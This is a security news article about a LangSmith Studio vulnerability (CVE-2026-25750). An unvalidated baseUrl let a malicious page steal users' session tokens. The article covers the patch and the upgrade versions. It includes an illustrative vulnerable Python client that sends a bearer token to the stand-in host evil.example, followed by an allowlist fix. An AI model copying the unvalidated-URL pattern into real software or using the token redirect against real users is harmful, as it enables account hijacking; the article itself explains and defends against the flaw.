Critical LangSmith Vulnerability Exposes Users to Account Takeover
In short, a flaw in LangSmith could let attackers hijack user accounts with no interaction beyond visiting a malicious page.
A critical vulnerability in LangSmith could allow hackers to take over user accounts. This flaw affects users who rely on LangSmith for AI data monitoring. Immediate action is required to ensure security and protect sensitive information.
The Flaw
Security researchers from Miggo have uncovered a critical vulnerability in LangSmith, identified as CVE-2026-25750. This flaw poses a significant risk to users, allowing potential token theft and complete account takeover. LangSmith serves as a central hub for debugging and monitoring large language model data, processing billions of events daily. This makes the vulnerability particularly dangerous for enterprise AI environments.
The vulnerability originates from an insecure API configuration feature within LangSmith Studio. It uses a flexible baseUrl parameter, which allows developers to fetch data from various backend APIs. Previously, the application trusted this input without validating the destination domain, creating a serious security gap. If a user clicks a malicious link or visits a compromised site, their browser could route API requests and session credentials to an attacker-controlled server.
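The flawed pattern can be illustrated with a minimal sketch. The function name, endpoint path, and token below are hypothetical stand-ins, not LangSmith's actual code; the point is that a client which builds requests from an attacker-controllable base URL will attach its credentials to whatever host that input names.

```python
# Illustrative only: a hypothetical client that trusts a user-supplied baseUrl.
SESSION_TOKEN = "example-session-token"  # stands in for a real session credential

def fetch_traces(base_url: str) -> str:
    """Build a request target directly from untrusted input.

    Vulnerable pattern: the destination host comes verbatim from the
    baseUrl parameter, so the Authorization header goes wherever that
    parameter points, including an attacker-controlled server.
    """
    target = f"{base_url.rstrip('/')}/api/v1/traces"
    auth_header = f"Bearer {SESSION_TOKEN}"
    # With base_url = "https://evil.example", the token above is
    # delivered straight to evil.example.
    return f"GET {target} (Authorization: {auth_header})"

print(fetch_traces("https://evil.example"))
```

Because no validation happens between receiving the parameter and sending the request, the browser's session credentials leak as a side effect of an ordinary API call.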
What's at Risk
Exploiting this vulnerability does not require traditional phishing methods. Instead, the attack occurs silently in the background, using the victim’s active session. When a victim visits a malicious webpage, a script forces their browser to load a crafted LangSmith Studio URL pointing to an attacker-controlled server. This results in the victim’s browser sending session credentials to the malicious domain instead of the legitimate server.
Once the attacker intercepts the session token, they have a five-minute window to hijack the account before the token expires. The implications of an account takeover in an AI observability platform are severe. Attackers can access detailed AI trace histories, which often include sensitive debugging data, proprietary source code, and even financial records. They can also manipulate project settings or delete critical observability workflows, jeopardizing the integrity of the entire system.
Patch Status
In response to this vulnerability, LangChain has implemented a strict allowed origins policy. This update mandates that domains must be explicitly configured as trusted origins in account settings before they can be accepted as an API base URL. Any unauthorized requests are now automatically blocked. According to the LangSmith Security Advisory released on January 7, 2026, there is currently no evidence of active exploitation in the wild.
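The allowed-origins defense can be sketched as follows. The function name, the allowlist contents, and the settings structure are illustrative assumptions, not LangSmith's implementation; the essential idea is comparing the scheme-plus-host origin of any proposed base URL against an explicit per-account allowlist before accepting it.

```python
from urllib.parse import urlparse

# Hypothetical per-account setting: only these origins may serve as an API base URL.
ALLOWED_ORIGINS = {"https://api.smith.langchain.com"}

def validate_base_url(base_url: str) -> str:
    """Accept base_url only if its scheme://host matches a trusted origin."""
    parts = urlparse(base_url)
    origin = f"{parts.scheme}://{parts.netloc}"
    if origin not in ALLOWED_ORIGINS:
        # Untrusted destinations are rejected before any request is built.
        raise ValueError(f"Blocked untrusted base URL origin: {origin}")
    return base_url

validate_base_url("https://api.smith.langchain.com/api/v1")  # accepted
# validate_base_url("https://evil.example/api")  # raises ValueError
```

Matching on the full origin (scheme and host) rather than a substring matters: naive checks like `"langchain.com" in base_url` can be bypassed with hosts such as `langchain.com.evil.example`.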
For cloud customers, the vulnerability was resolved by December 15, 2025, and no action is required. However, self-hosted administrators must upgrade to LangSmith version 0.12.71 or Helm chart langsmith-0.12.33 or later to ensure protection.
Immediate Actions
Users of LangSmith should take this vulnerability seriously. If you are a self-hosted administrator, ensure that your environment is updated to the latest version immediately. For cloud users, verify that your systems are functioning correctly and monitor for any unusual activity. Staying informed about security updates and best practices is essential in maintaining a secure environment, especially when dealing with sensitive AI data.
By addressing this vulnerability swiftly, organizations can safeguard their assets and maintain trust in their AI systems.
Cyber Security News